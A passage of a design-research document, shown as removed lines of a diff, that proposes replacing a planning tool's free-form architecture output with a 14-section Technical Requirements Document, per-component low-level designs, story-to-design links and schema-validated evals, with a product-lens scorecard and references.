-<p>Google's template — Context · Goals/Non-goals · The design · Alternatives · Cross-cutting concerns — is the empirical template Shield's existing <code>plan-architecture.html</code> already resembles. Adopting it explicitly closes the gap.</p>
-<h3 id="will-larson--lethaincom">Will Larson — <code>lethain.com</code></h3>
-<blockquote>
-<p><em>&quot;Design documents describe the decisions and tradeoffs you've made in specific projects.&quot;</em></p>
-<p><em>&quot;A batch of five design docs is the ideal ingredient for writing an effective strategy because design documents have what bad strategies lack: detailed specifics grounded in reality.&quot;</em></p>
-<p><em>&quot;You should write a design document for any project whose capabilities will be used by numerous future projects … any work taking more than a month of engineering time.&quot;</em></p>
-<p><em>&quot;Gather perspectives widely but write alone.&quot;</em>
-— <a href="https://lethain.com/eng-strategies/">Writing an engineering strategy, lethain.com</a></p>
-</blockquote>
-<p>Larson's &quot;design-doc-as-decision-artifact&quot; framing reinforces that the TRD should privilege decisions and trade-offs over comprehensive specification. The &quot;write alone&quot; rule is implementation guidance for the <code>/plan</code> agent: produce a single, opinionated TRD per run, not a consensus-shaped one.</p>
-<h3 id="gergely-orosz--the-pragmatic-engineer">Gergely Orosz — The Pragmatic Engineer</h3>
-<blockquote>
-<p><em>&quot;Software engineers who write design docs for their architecture — and ask for reviews on it — often ship more maintainable architecture.&quot;</em></p>
-<p>On Uber's RFC scale problems at &gt;2,000 engineers: <em>&quot;Noise: Hundreds of RFCs weekly overwhelmed experienced engineers; Ambiguity: Unclear which work required documentation; Discoverability: Documents scattered across Google Drive.&quot;</em>
-— <a href="https://blog.pragmaticengineer.com/rfcs-and-design-docs/">RFCs and Design Docs, blog.pragmaticengineer.com</a></p>
-</blockquote>
-<p>Orosz's account of design-doc value at scale supports adopting a uniform template for Shield's TRD output. Shield's <code>/plan</code> audience is one team per run, so the Uber-scale &quot;tiered templates&quot; remediation doesn't apply — a single 14-section template is the right level of structure.</p>
-<h3 id="simon-brown--the-c4-model">Simon Brown — The C4 model</h3>
-<blockquote>
-<p><em>&quot;Container&quot; — a separately runnable/deployable unit (e.g., a server-side web application, a single-page application, a desktop application, a mobile app, a database schema, a file system) that executes code or stores data.</em></p>
-<p><em>&quot;Component&quot; — a grouping of related functionality encapsulated behind a well-defined interface. From an implementation perspective, components are typically a collection of implementation classes/objects.&quot;</em>
-— <a href="https://c4model.com/">The C4 model for visualising software architecture, c4model.com</a></p>
-</blockquote>
-<p>The C4 model's Container and Component levels are the natural granularity for LLD documents in Shield's setup. One LLD per Container (or per Component for finer-grained services) cleanly aligns with how engineers reason about ownership and deployability — and avoids the milestone-LLD-proliferation that per-milestone LLDs would cause for cross-cutting components.</p>
-<h3 id="reference-trds-actual-practice-notion-workspace-internal-evidence">Reference TRD's actual practice (Notion workspace, internal evidence)</h3>
-<blockquote>
-<p>Reference TRD Template (last edited 2025-11-04) explicitly: <em>&quot;HLD — Objective: Explain how the system will behave end-to-end. Include: Block diagram or sequence diagram showing data flow between frontend, backend, and external services / Key microservices involved / Event triggers, queues, APIs, and DBs touched.&quot;</em></p>
-<p><em>&quot;LLD — Objective: Capture how each component or service works internally. Include: Components / Class/State diagrams / Database schema changes / API Contracts / Non Functional Aspects (error handling, retry, config) / Caching or fallback mechanisms.&quot;</em>
-— <a href="https://www.notion.so/29a1ab62faf5805ea7dadefb9d052af0">Reference TRD Template (Notion)</a></p>
-</blockquote>
-<p><strong>Observed deviations from the reference template in real artifacts:</strong></p>
-<ul>
-<li>Large features split HLD and LLD into <strong>separate Notion pages</strong>. One library LLD opens: <em>&quot;The TRD describes what the library does and why. This LLD describes how.&quot;</em></li>
-<li>Small features keep HLD+LLD inline but <strong>omit the section labels</strong> entirely — using functional headings like &quot;Architecture Components&quot; and &quot;Implementation Plan.&quot;</li>
-<li>&quot;Solutioning&quot; is used as a sibling term to HLD (one HLD title: <em>&quot;... — High-Level Design &amp; Solutioning Document&quot;</em>) — signals that decision-rationale lives next to the architecture, validating the Alternatives + Cross-Cutting sections.</li>
-<li>One reference TRD has an <strong>explicit &quot;Implementation Plan&quot; section with 5 phases</strong> — a real precedent for the proposed §10 Milestones.</li>
-</ul>
-<p><strong>LLD granularity in the reference workspace is per-service/per-library</strong> (one example LLD covers a single library and is referenced by whichever milestone touches it). Shield will adopt this convention: <strong>LLDs are per-component (C4 Container/Component level)</strong>, and the TRD's §10 Milestones declares which LLD components each milestone touches. A single LLD doc grows incrementally across milestones.</p>
-<h2 id="how-this-works-in-practice--plan-refactor-flow">How This Works in Practice — <code>/plan</code> Refactor Flow</h2>
-<pre><code>PRD (optional)
-   │
-   ▼
-/plan ────────────► TRD (HLD + Milestones)  ←── replaces plan-architecture.md
-   │                  │
-   │                  ├─ §1–9: HLD (problem, goals, design, NFRs, cross-cutting)
-   │                  ├─ §10: Milestones — each lists touched LLD components
-   │                  └─ §11–14: APIs, open Qs, references, rollback strategy
-   │
-   ▼
-plan.json (stories with design_refs[])
-   │
-   ├──► /implement (consumes story + design_refs[])
-   ├──► /pm-sync (consumes plan.json; design_refs[] become PM-tool links)
-   └──► [future] /lld &lt;component&gt;  ──► per-component LLD doc (14-section template from PR #43)
-              │
-              ├─ Header: Linked plans = [plan/M1, plan/M2, ...]   ← bidirectional
-              ├─ §1 Overview names the epics/milestones served
-              ├─ §14 Changelog: each edit has Story ID + sections touched
-              │
-              ├─ M1 may touch [lld-component-auth.md, lld-component-api.md]
-              ├─ M2 may touch [lld-component-api.md, lld-component-ui.md]
-              └─ Same LLD doc grows incrementally across milestones; §14 records each touch
-</code></pre>
-<p><strong>Reference example:</strong> <a href="https://github.com/infraspecdev/tesseract/pull/43">tesseract PR #43</a> — <code>docs/superpowers/specs/2026-05-18-lld-sample.html</code>. Bytebite user-signup LLD. 704 lines of HTML, 14 sections, 12 always-on + 2 promote-on-demand, with stable kebab-case anchors on every section and subsection. This is the structural model <code>/lld</code> will emit.</p>
-<h3 id="story-to-design-section-reference-contract">Story-to-design-section reference contract</h3>
-<p>Add an optional <code>design_refs[]</code> array to each story in <code>plan.json</code>:</p>
-<pre><code class="language-json">{
-  &quot;id&quot;: &quot;E1-S1&quot;,
-  &quot;title&quot;: &quot;Implement POST /users endpoint&quot;,
-  &quot;design_refs&quot;: [
-    {
-      &quot;doc&quot;: &quot;trd&quot;,
-      &quot;section_id&quot;: &quot;high-level-design&quot;,
-      &quot;anchor_url&quot;: &quot;trd.md#high-level-design&quot;,
-      &quot;label&quot;: &quot;TRD §7 High-Level Design&quot;
-    },
-    {
-      &quot;doc&quot;: &quot;lld&quot;,
-      &quot;component&quot;: &quot;user-service&quot;,
-      &quot;section_id&quot;: &quot;api-create-user&quot;,
-      &quot;anchor_url&quot;: &quot;lld-user-service.md#api-create-user&quot;,
-      &quot;label&quot;: &quot;LLD §5.1 POST /users&quot;
-    }
-  ]
-}
-</code></pre>
-<p><strong>Properties:</strong></p>
-<ul>
-<li><strong>Additive</strong> — adapters that don't understand <code>design_refs</code> ignore it. No <code>/pm-sync</code> schema break.</li>
-<li><strong>Component-scoped</strong> — LLD refs include <code>component</code> so multiple stories across multiple milestones can point at the same LLD doc; the LLD's <code>Linked plans</code> header and §14 Changelog close the loop on the other side.</li>
-<li><strong>Stable kebab-case anchors</strong> — <code>section_id</code> matches the LLD sample's explicit <code>id=&quot;...&quot;</code> attributes (e.g., <code>#api-create-user</code>, <code>#perf-load</code>), not heading-derived. Confluence-style anchor-rot bugs (CONFSERVER-26897/28087/41483) don't apply because we author the IDs explicitly.</li>
-<li><strong>Subsection-resolvable</strong> — points at <code>#api-create-user</code> (LLD §5.1), not just <code>#api-contracts</code> (LLD §5). Required for the precision the LLD sample establishes (per-endpoint, per-flow, per-perf-aspect anchors).</li>
-<li><strong>Forward-resolvable</strong> — <code>lld</code> refs can be added when the LLD is authored; the TRD generator leaves them as TODO entries until then.</li>
-<li><strong>PM-sync adapter behavior:</strong> Confluence/Jira → web link with anchor URL. ClickUp → URL custom field (+ optional Doc relate). Notion → URL property (+ optional Database relation).</li>
-</ul>
-<h3 id="de-duplication-contract-addresses-the-users-named-risk">De-duplication contract (addresses the user's named risk)</h3>
-<table>
-<thead>
-<tr>
-<th>Concern</th>
-<th>Owner doc</th>
-<th>TRD treatment</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>User problem, personas, business impact</td>
-<td>PRD</td>
-<td>TRD §2 links the PRD; restates problem in 1 sentence max for self-containment</td>
-</tr>
-<tr>
-<td>Functional requirements (what users do)</td>
-<td>PRD</td>
-<td>TRD §5 links PRD's user stories; doesn't restate them</td>
-</tr>
-<tr>
-<td>Non-functional requirements</td>
-<td>PRD names targets; TRD specifies architecture-level NFRs</td>
-<td>TRD §6</td>
-</tr>
-<tr>
-<td>Architecture &amp; design</td>
-<td>TRD</td>
-<td>TRD §7</td>
-</tr>
-<tr>
-<td>Alternatives &amp; trade-offs</td>
-<td>TRD</td>
-<td>TRD §8</td>
-</tr>
-<tr>
-<td>Component-internal algorithms, schemas, contracts</td>
-<td>LLD</td>
-<td>TRD §11 lists <em>which</em> APIs; LLD specifies their internals</td>
-</tr>
-<tr>
-<td>Work breakdown</td>
-<td>plan.json</td>
-<td>Plan generates stories; stories <code>design_refs[]</code> back to TRD/LLD</td>
-</tr>
-</tbody>
-</table>
-<p>Rule (paraphrased from Koko Product on PRD vs TRD): <strong>&quot;PRD owns <em>why</em>; TRD owns <em>how at architecture level</em>; LLD owns <em>how at component level</em>; plan owns <em>work breakdown</em>. Cross-references replace restatement.&quot;</strong></p>
-<h2 id="failure-modes--countermeasures">Failure Modes &amp; Countermeasures</h2>
-<p>Community research surfaced 10 named failure modes. Five are directly addressable by Shield's eval framework + structural choices:</p>
-<table>
-<thead>
-<tr>
-<th>Failure mode</th>
-<th>Source</th>
-<th>Shield countermeasure</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td><strong>Format drift across agent runs</strong> — different sessions produce differently-shaped TRDs</td>
-<td>User's stated risk + Cvet 2020 + acatton (Lobsters) — <em>&quot;authors and reviewers felt that most of the RFC template was superfluous&quot;</em></td>
-<td><strong>Schema-validated TRD eval</strong>: a fixture-based eval asserts presence of §1–14, asserts each section is non-empty (with <code>n/a — &lt;reason&gt;</code> as the only allowed escape), asserts <code>design_refs[]</code> shape. Backend + infra positive fixtures both pass. RED → GREEN trail required per CLAUDE.md.</td>
-</tr>
-<tr>
-<td><strong>Content duplication PRD↔TRD↔plan</strong> — same content restated, drifts independently</td>
-<td>User's stated risk + Plane.so + Koko Product — <em>&quot;Keep the boundary clean.&quot;</em></td>
-<td>The de-duplication contract above + a <code>/plan-review</code> rule: flag any TRD section that restates PRD content verbatim.</td>
-</tr>
-<tr>
-<td><strong>Undead documentation / silent divergence</strong> — doc reflects an outdated reality</td>
-<td>Doug Turnbull (softwaredoug.com) — <em>&quot;most design docs lie to you. They're undead documentation&quot;</em>; Lucas Costa — <em>&quot;Either you update the doc (which nobody does) or you diverge from it silently&quot;</em></td>
-<td>Shield's <code>/plan</code> re-runs <strong>update the same files in place</strong> (per current behavior). Combined with git history, the TRD is a snapshot at decision time. Recommend a <code>last_aligned_with: &lt;commit-sha&gt;</code> metadata field updated by <code>/implement</code> when stories close.</td>
-</tr>
-<tr>
-<td><strong>Over-specification (&quot;LLD too early&quot;)</strong> — schema/API decisions before query patterns are understood</td>
-<td>Lucas Costa — <em>&quot;you have the least information at the beginning of a project, which is exactly when design docs ask you to make the most decisions&quot;</em></td>
-<td>Defer LLD to per-milestone authoring. TRD §11 names <em>which</em> APIs change; LLD specifies their internals only when the milestone begins.</td>
-</tr>
-<tr>
-<td><strong>Implementation-manual pseudo-code</strong> — doc just narrates code with no trade-offs</td>
-<td>Google design-docs doc — <em>&quot;design docs that are really implementation manuals … it would probably have been a better idea to write the actual program right away&quot;</em></td>
-<td><code>/plan-review</code> rule: flag any HLD section that contains code blocks &gt; N lines without an &quot;Alternatives Considered&quot; rationale.</td>
-</tr>
-</tbody>
-</table>
-<p>Five more failure modes (design-doc theatre, review-rubber-stamp, RFC firing-squad, authority fragmentation, template bloat) are governance issues not directly fixable by structural choices — flag as future <code>/plan-review</code> rubric expansions.</p>
-<h2 id="decisions-locked--open-questions">Decisions Locked &amp; Open Questions</h2>
-<h3 id="decisions-locked-with-the-user-2026-05-24--2026-05-25">Decisions locked with the user (2026-05-24 → 2026-05-25)</h3>
-<ol>
-<li><strong>LLD granularity: strictly per-component (C4-inspired).</strong> One LLD per Container or Component (service, library, module). Milestones list which LLDs they touch; LLDs grow incrementally as milestones land. LLDs are typically backend-only; infra rarely needs an LLD layer.</li>
-<li><strong>No lean variant.</strong> The full 14-section template is required for every TRD. (Orosz's tiered-template pattern applies at &gt;2,000-engineer scale, not Shield's per-team scope.)</li>
-<li><strong>Direct cutover.</strong> <code>/plan</code> stops writing <code>plan-architecture.md</code> immediately. No feature flag, no side-by-side period. Existing <code>plan-architecture.md</code> files remain readable; no migration tool needed.</li>
-<li><strong>Section enforcement: strict via eval, with <code>n/a — &lt;reason&gt;</code> escape.</strong> All 14 TRD sections are required by the schema-validated eval. Missing any section is an eval failure with a named error. An explicit <code>n/a — &lt;reason&gt;</code> line counts as present; vague TBDs or empty sections fail.</li>
-<li><strong>One TRD, two domains.</strong> Same 14-section template applies to backend AND infrastructure work. Domain-aware prompting per section in <code>/plan</code>'s SKILL.md surfaces the right interpretation; the eval and <code>/plan-review</code> rubric do not fork.</li>
-<li><strong>§14 Rollback Strategy is a first-class section.</strong> Preserves the strongest property of today's <code>plan-architecture.md</code>.</li>
-</ol>
-<h3 id="open-questions-for-the-implementation-phase">Open questions for the implementation phase</h3>
-<ol>
-<li><strong><code>design_refs[]</code> resolution at PM-sync time.</strong> Should adapters auto-create Confluence/Notion pages and link them, or only emit URLs and trust the user to author the pages? Recommendation: <strong>emit URLs only</strong> in v1; adapter authoring is a v2 enhancement.</li>
-<li><strong>Section-ID stability.</strong> TRD section anchors should be stable kebab-case slugs (<code>#high-level-design</code>), not heading-derived (which break on rename per Confluence CONFSERVER-26897/28087/41483). Concrete recommendation: emit explicit <code>{#section-id}</code> markdown anchors in the TRD template, and validate the slug set is the canonical 14 in the eval.</li>
-<li><strong>TRD ↔ LLD linking direction.</strong> TRD §10 lists LLDs each milestone touches (forward link). Should LLDs maintain backlinks to milestones/TRD? Recommendation: <strong>yes, but auto-generated</strong> — <code>/lld</code> reads the TRD, fills in a &quot;Referenced By&quot; section in the LLD pointing back to milestones. Avoids manual link-rot.</li>
-<li><strong><code>/pm-sync</code> adapter behavior for <code>design_refs[]</code>.</strong> Confluence → web link with anchor URL. Jira → remote issue link. ClickUp → URL custom field. Notion → URL property. Open: should ClickUp/Notion also populate a Relationship/Database-relation if the design doc exists in the same tool? Recommendation: <strong>v1 emits URL only</strong>, structured relationships are v2.</li>
-<li><strong>Eval shape for TRD.</strong> Concrete eval design: a fixture TRD with all 14 sections present passes; fixtures missing any section fail with a named error per section. Bidirectional check: the LLM does not add unprompted sections (drift-by-addition). <code>n/a — &lt;reason&gt;</code> lines count as present; vague TBDs or empty sections do not. Coverage includes both backend and infra positive fixtures. All covered by <code>shield/evals/plan-trd.yaml</code> fixture set.</li>
-</ol>
-<h2 id="migration-path--reversibility">Migration Path / Reversibility</h2>
-<p>The refactor is a direct cutover; reversibility cost is low:</p>
-<ul>
-<li><strong>Forward:</strong> <code>/plan</code> adds TRD generation step before plan.md/plan.json. <code>plan-architecture.md</code> is replaced by <code>trd.md</code> immediately (no feature flag). Story schema gains optional <code>design_refs[]</code>. <code>/plan-review</code> gets new TRD-section rules. Estimated work: one PR for the <code>/plan</code> command + plan-docs SKILL.md changes, one PR for evals, one PR for <code>/plan-review</code> rule additions.</li>
-<li><strong>Reversal:</strong> If the TRD approach proves wrong, revert <code>plan-docs/SKILL.md</code> to the pre-refactor template + restore <code>plan-architecture.md</code> generation. Existing <code>trd.md</code> files remain readable in old feature folders. <code>design_refs[]</code> is optional everywhere, so removing it is a no-op for downstream adapters.</li>
-<li><strong>Existing artifacts:</strong> Pre-refactor feature folders keep their <code>plan-architecture.md</code> — no rewrite, no migration. New folders get <code>trd.md</code>. This is git-history-friendly and doesn't break anyone reading older docs.</li>
-</ul>
-<h2 id="summary">Summary</h2>
-<p>The TRD = HLD + PM-lens milestones + Rollback Strategy design is well-supported by the IEEE 1016 / Sommerville / Pressman lineage, mirrors the reference TRD template, and aligns with Google + Uber + Larson + Orosz modern practice. The <strong>unified 14-section TRD template covers both backend and infrastructure work</strong>, with domain-aware prompting per section and an explicit <code>n/a — &lt;reason&gt;</code> escape for sections that genuinely don't apply; the 14-section LLD template (anchored in <a href="https://github.com/infraspecdev/tesseract/pull/43">tesseract PR #43's Bytebite sample</a>) is the per-component layer authored separately and is <strong>typically backend-only</strong> since infra code is declarative-spec-as-code. <strong>LLDs are per-component (C4-inspired)</strong> — a single LLD covers one Container or Component, lists multiple <code>Linked plans</code> in its header, and grows incrementally as milestones touch it; §14 Changelog records each touch with a Story ID. Story traceability via additive <code>design_refs[]</code> (component-scoped, subsection-precise) is the highest-signal way to link work to design without breaking <code>/pm-sync</code>. The two named risks (format drift, content duplication) have concrete countermeasures: schema-validated evals enforcing all sections (and §12's 8 forced subsections in the LLD), and a de-duplication contract (&quot;PRD owns <em>why</em>, TRD owns <em>how at architecture</em>, LLD owns <em>how at component</em>, plan owns <em>work breakdown</em>&quot;). The refactor is a direct cutover with no feature flag; reversal is a simple revert with no migration burden.</p>
-<h2 id="product-lens">Product Lens</h2>
-<h3 id="scorecard-pm1pm11">Scorecard (PM1–PM11)</h3>
-<table>
-<thead>
-<tr>
-<th>Dim</th>
-<th>Name</th>
-<th>Grade</th>
-<th>Severity</th>
-<th>Gap</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td>PM1</td>
-<td>User impact clarity</td>
-<td><strong>D</strong></td>
-<td>Critical</td>
-<td>Roles named abstractly (&quot;reviewers&quot;, &quot;engineers&quot;); no quantified before/after per persona</td>
-</tr>
-<tr>
-<td>PM2</td>
-<td>Problem–solution fit</td>
-<td><strong>B</strong></td>
-<td>Critical</td>
-<td>Missing explicit Problem Statement section <em>before</em> Decision; named risks appear pre-problem</td>
-</tr>
-<tr>
-<td>PM3</td>
-<td>Scope discipline</td>
-<td><strong>B</strong></td>
-<td>Important</td>
-<td>14 TRD + 14 LLD sections (+ §12's 8 forced subsections) reads kitchen-sink; no MVP cut explicit</td>
-</tr>
-<tr>
-<td>PM4</td>
-<td>Prioritization rationale</td>
-<td><strong>D</strong></td>
-<td>Important</td>
-<td>Three PRs listed without effort/impact tags or stated dependencies</td>
-</tr>
-<tr>
-<td>PM5</td>
-<td>Stakeholder communicability</td>
-<td><strong>D</strong></td>
-<td>Important</td>
-<td>Jargon-saturated; no plain-language summary a non-technical reader could follow</td>
-</tr>
-<tr>
-<td>PM6</td>
-<td>Market / competitive awareness</td>
-<td><strong>A</strong></td>
-<td>Warning</td>
-<td>Strong: <code>plan-architecture.md</code>, reference TRD, Google, Uber, IEEE 1016, C4, arc42, ADR all compared</td>
-</tr>
-<tr>
-<td>PM7</td>
-<td>Adoption / rollout risk</td>
-<td><strong>B</strong></td>
-<td>Important</td>
-<td>Technical risks covered; adoption-side risks (learning curve, change mgmt, partner buy-in) missing</td>
-</tr>
-<tr>
-<td>PM8</td>
-<td>Success metrics defined</td>
-<td><strong>F</strong></td>
-<td>Important</td>
-<td>No measurable post-ship outcome (no thresholds, targets, observable behaviors)</td>
-</tr>
-<tr>
-<td>PM9</td>
-<td>Reversibility / exit cost</td>
-<td><strong>A</strong></td>
-<td>Warning</td>
-<td>Strong: clean revert path, no migration burden, additive schema</td>
-</tr>
-<tr>
-<td>PM10</td>
-<td>Business value alignment</td>
-<td><strong>F</strong></td>
-<td>Critical</td>
-<td>No tie to business goal/OKR/customer escalation/compliance — justified entirely on engineering grounds</td>
-</tr>
-<tr>
-<td>PM11</td>
-<td>Framing coverage honored</td>
-<td><strong>B</strong></td>
-<td>Important</td>
-<td>All 5 PF7 voices quoted; PF8 &quot;Vendor docs&quot; category has refs but no verbatim body quote</td>
-</tr>
-</tbody>
-</table>
-<p><strong>Composite:</strong> 2A · 3B · 3D · 2F (≈ C+ overall). <strong>3 Critical gaps</strong> to close before this is plan-ready: PM1 (user-impact quantification), PM2 (Problem Statement section), PM10 (business-value tie-in).</p>
-<h3 id="user-impact-analysis">User Impact Analysis</h3>
-<p>The proposed TRD refactor directly serves five user populations identified in the framing brief, and the research provides differentiated evidence for each:</p>
-<ul>
-<li><strong>Shield maintainer</strong> — Highest leverage beneficiary. The named risks (format drift, content duplication) get concrete countermeasures: a schema-validated eval enforces all 14 TRD sections, and the de-duplication contract codifies ownership across PRD/TRD/LLD/plan. Risk of inaction: continued ad-hoc <code>plan-architecture.md</code> output that <code>/plan-review</code> can only grade free-form.</li>
-<li><strong>Staff/senior engineers reading the TRD</strong> — Gain a predictable artifact grounded in IEEE 1016 viewpoints, Sommerville's three architecture justifications, and the reference TRD template. Research quantifies coverage: 12 IEEE viewpoints, split ~7 HLD / ~5 LLD; 14 canonical TRD sections; 14 canonical LLD sections (12 always-on + 2 promote-on-demand).</li>
-<li><strong>Junior/mid engineers consuming via <code>/implement</code></strong> — Gain unambiguous design pointers via <code>design_refs[]</code> with subsection-precision (e.g., <code>#api-create-user</code> not <code>#api-contracts</code>). Research cites the Bytebite sample (PR #43, 704 lines, kebab-case anchors on every section and subsection) as the concrete structural target.</li>
-<li><strong><code>/plan-review</code> reviewer agents</strong> — Gain stable section anchors enabling structured rubrics instead of free-form grading. Research surfaces five mechanically-enforceable rules.</li>
-<li><strong><code>/pm-sync</code></strong> — Hard backward-compat constraint is <strong>met</strong>: <code>design_refs[]</code> is additive, adapters ignore unknown fields. No schema break.</li>
-</ul>
-<p><strong>Unquantified gaps:</strong></p>
-<ul>
-<li>No estimate of how many existing feature folders carry <code>plan-architecture.md</code>. Direct-cutover migration risk is asserted &quot;low&quot; but not measured.</li>
-<li>No baseline for current <code>/plan-review</code> defect-catch rate vs. expected post-refactor rate.</li>
-<li>&quot;Future LLD-authoring command&quot; is described but its build effort is not estimated.</li>
-</ul>
-<h3 id="scope-recommendation">Scope Recommendation</h3>
-<p><strong>Essential (MVP — ship in v1 cutover):</strong></p>
-<ol>
-<li><code>/plan</code> emits <code>trd.md</code> with the canonical 14 sections (replaces <code>plan-architecture.md</code>).</li>
-<li>Stable kebab-case section anchors emitted explicitly as <code>{#section-id}</code> markdown anchors.</li>
-<li><code>plan.json</code> story schema gains optional additive <code>design_refs[]</code> with <code>{doc, section_id, anchor_url, label}</code>.</li>
-<li>Schema-validated eval fixture pair (positive + missing-section negatives) under <code>shield/evals/plan-trd.yaml</code>.</li>
-<li><code>/plan-review</code> rules for the 14 required sections (with <code>n/a — &lt;reason&gt;</code> escape) + at least one duplication-detection rule.</li>
-</ol>
-<p><strong>Defer (v2 enhancements):</strong></p>
-<ul>
-<li><code>/lld &lt;component&gt;</code> command — template locked; authoring command is &quot;future&quot;. v1 leaves <code>lld</code> refs as TODO entries.</li>
-<li>Adapter auto-creation of Confluence/Notion pages from <code>design_refs[]</code> — v1 emits URLs only.</li>
-<li>Structured ClickUp/Notion relationships — v1 emits URLs only.</li>
-<li><code>last_aligned_with: &lt;commit-sha&gt;</code> metadata for undead-doc countermeasure.</li>
-<li><code>/lld</code> auto-generated &quot;Referenced By&quot; backlinks.</li>
-<li>Governance failure-mode rules (design-doc theatre, review-rubber-stamp, etc.).</li>
-</ul>
-<p><strong>Cut entirely:</strong></p>
-<ul>
-<li>Lean TRD variant — research locks this as <strong>rejected</strong>. Do not relitigate.</li>
-<li>Migration tool for existing <code>plan-architecture.md</code> — direct cutover, no migration.</li>
-</ul>
-<h3 id="prioritization-framework">Prioritization Framework</h3>
-<table>
-<thead>
-<tr>
-<th>Priority</th>
-<th>Work item</th>
-<th>Effort</th>
-<th>Impact</th>
-<th>Dependency</th>
-</tr>
-</thead>
-<tbody>
-<tr>
-<td><strong>P0</strong></td>
-<td>Schema-validated TRD eval fixture pair + section slug allow-list</td>
-<td>M</td>
-<td><strong>Very high</strong> — strongest format-drift countermeasure; CLAUDE.md mandate</td>
-<td>Section list locked (done)</td>
-</tr>
-<tr>
-<td><strong>P0</strong></td>
-<td><code>/plan</code> command + <code>plan-docs/SKILL.md</code> updates to emit <code>trd.md</code> with 14 canonical sections, domain-aware prompting per section, and explicit <code>{#section-id}</code> anchors</td>
-<td>L</td>
-<td><strong>Very high</strong> — the actual cutover</td>
-<td>None</td>
-</tr>
-<tr>
-<td><strong>P0</strong></td>
-<td><code>plan.json</code> story schema: additive <code>design_refs[]</code></td>
-<td>S</td>
-<td><strong>High</strong> — story traceability + <code>/implement</code> consumption</td>
-<td>None (additive)</td>
-</tr>
-<tr>
-<td><strong>P1</strong></td>
-<td><code>/plan-review</code> rules for required-section presence + 1 duplication-detection rule</td>
-<td>M</td>
-<td>High — converts free-form review into structured grading</td>
-<td>P0 schema lands first</td>
-</tr>
-<tr>
-<td><strong>P1</strong></td>
-<td><code>/pm-sync</code> adapter handling for <code>design_refs[]</code> URL emission (all four adapters)</td>
-<td>M</td>
-<td>Medium — read-only forward link in v1</td>
-<td><code>design_refs[]</code> shape locked (done)</td>
-</tr>
-<tr>
-<td><strong>P2</strong></td>
-<td><code>last_aligned_with</code> metadata + <code>/implement</code> update on story close</td>
-<td>S</td>
-<td>Medium — undead-doc countermeasure</td>
-<td>After v1 stable</td>
-</tr>
-<tr>
-<td><strong>P2</strong></td>
-<td><code>/plan-review</code> rules for remaining failure-mode countermeasures</td>
-<td>M</td>
-<td>Medium — incremental review quality</td>
-<td>After P1</td>
-</tr>
-<tr>
-<td><strong>P3 (deferred)</strong></td>
-<td><code>/lld &lt;component&gt;</code> command + LLD eval fixtures</td>
-<td>L</td>
-<td>High <em>for LLD consumers</em> — but no LLD consumers exist yet</td>
-<td>After v1, separate epic</td>
-</tr>
-<tr>
-<td><strong>P3 (deferred)</strong></td>
-<td>Adapter auto-creation of design-doc pages</td>
-<td>L</td>
-<td>Low — research recommends URL-only in v1</td>
-<td>After <code>/lld</code></td>
-</tr>
-</tbody>
-</table>
-<p><strong>Sequencing rationale:</strong> P0 items land together in the cutover PR (eval can't ship before generator; generator shouldn't ship without eval). <code>design_refs[]</code> is additive and zero-risk, so it goes in v1 even with no consumer yet — locking the contract early avoids a v2 migration. <code>/lld</code> is genuinely deferrable because the TRD references LLDs by URL with TODO entries until the command exists.</p>
-<h3 id="stakeholder-summary">Stakeholder Summary</h3>
-<p>Shield's <code>/plan</code> command today produces a work breakdown and a free-form architecture sketch (<code>plan-architecture.md</code>). Engineers reading the output have no predictable place to find the system design, and reviewers have no consistent shape to grade against. The research recommends replacing the free-form sketch with a <strong>Technical Requirements Document (TRD)</strong> — a 14-section template grounded in the IEEE software-design standard, mirrored from the reference TRD template, and consistent with how Google, Uber, and respected practitioners (Will Larson, Gergely Orosz) describe modern design-doc practice. The TRD covers the <em>what</em> and the <em>architecture-level how</em> of a feature. The deeper component-internal details (database schemas, API internals, race-condition handling) move to per-component <strong>Low-Level Design (LLD)</strong> documents authored separately when each milestone begins, following a 14-section template Shield already has a working sample for. Every story in the work plan gains an optional pointer to the exact section of the TRD or LLD it depends on, so an engineer picking up a story can find the design in one click. The change ships as a direct replacement with no migration burden — existing feature folders keep their old artifacts and stay readable. The two biggest risks of templated design docs (templates drifting in shape across runs, and the same content being restated in three places that then disagree) are addressed with an automated check that enforces the section list and a written ownership rule of which document owns which content. The first release lands the new TRD output, the schema-enforcing test, and the story-to-design pointers; the LLD command and richer reviewer rules follow in a second release.</p>
-<h3 id="critical-gaps--user-verdict-2026-05-24">Critical gaps — user verdict (2026-05-24)</h3>
-<p>The three Critical-severity findings were reviewed with the requester. All three are acknowledged as artifacts of applying the full PM1–PM11 rubric (designed for PRDs / product features) to an internal-tooling research artifact. Verdict per gap:</p>
-<ol>
-<li><strong>PM1 — Quantified user-impact per persona.</strong> <em>Resolution:</em> the refactor's value is a baseline add to how tech teams currently work — the personas (plan author, reviewer, <code>/implement</code> consumer) all benefit uniformly. No additional quantification needed for an internal tooling change.</li>
-<li><strong>PM2 — Explicit Problem Statement section.</strong> <em>Resolution:</em> not required. Going to implementation directly; the Context paragraph at the top of this doc carries enough framing for engineering work.</li>
-<li><strong>PM10 — Business-value tie-in.</strong> <em>Resolution:</em> the value is to help tech teams iterate faster by automating planning steps that previously required free-form judgment. Not a business-OKR question for an internal Shield meta-tooling refactor.</li>
-</ol>
-<p>PM8 (success metrics) and PM4/PM5 (prioritization rationale, stakeholder communicability) are Important but not blocking — folded into the implementation work where the Prioritization Framework table already addresses sequencing.</p>
-<h2 id="references">References</h2>
-<ul>
-<li>IEEE Std 1016-2009, &quot;Software Design Descriptions.&quot; <a href="https://cengproject.cankaya.edu.tr/wp-content/uploads/sites/10/2017/12/SDD-ieee-1016-2009.pdf">Çankaya University full PDF</a> · <a href="https://ieeexplore.ieee.org/document/5167255">IEEE Xplore</a> · <a href="https://en.wikipedia.org/wiki/Software_design_description">Wikipedia summary</a></li>
-<li>Sommerville, I. (2015). <em>Software Engineering</em>, 10th ed. Pearson. Chapter 6 (Architectural Design) + Chapter 7 (Design and Implementation). <a href="https://www.pearson.com/en-us/subject-catalog/p/software-engineering/P200000003258/9780137503148">Pearson catalog</a></li>
-<li>Pressman, R., &amp; Maxim, B. (2014). <em>Software Engineering: A Practitioner's Approach</em>, 8th ed. McGraw-Hill. Chapters 12–15 (Design Concepts, Architectural Design, Component-Level Design, UI Design). <a href="https://books.google.com/books/about/Software_Engineering_A_Practitioner_s_Ap.html?id=i8NmnAEACAAJ">Google Books</a></li>
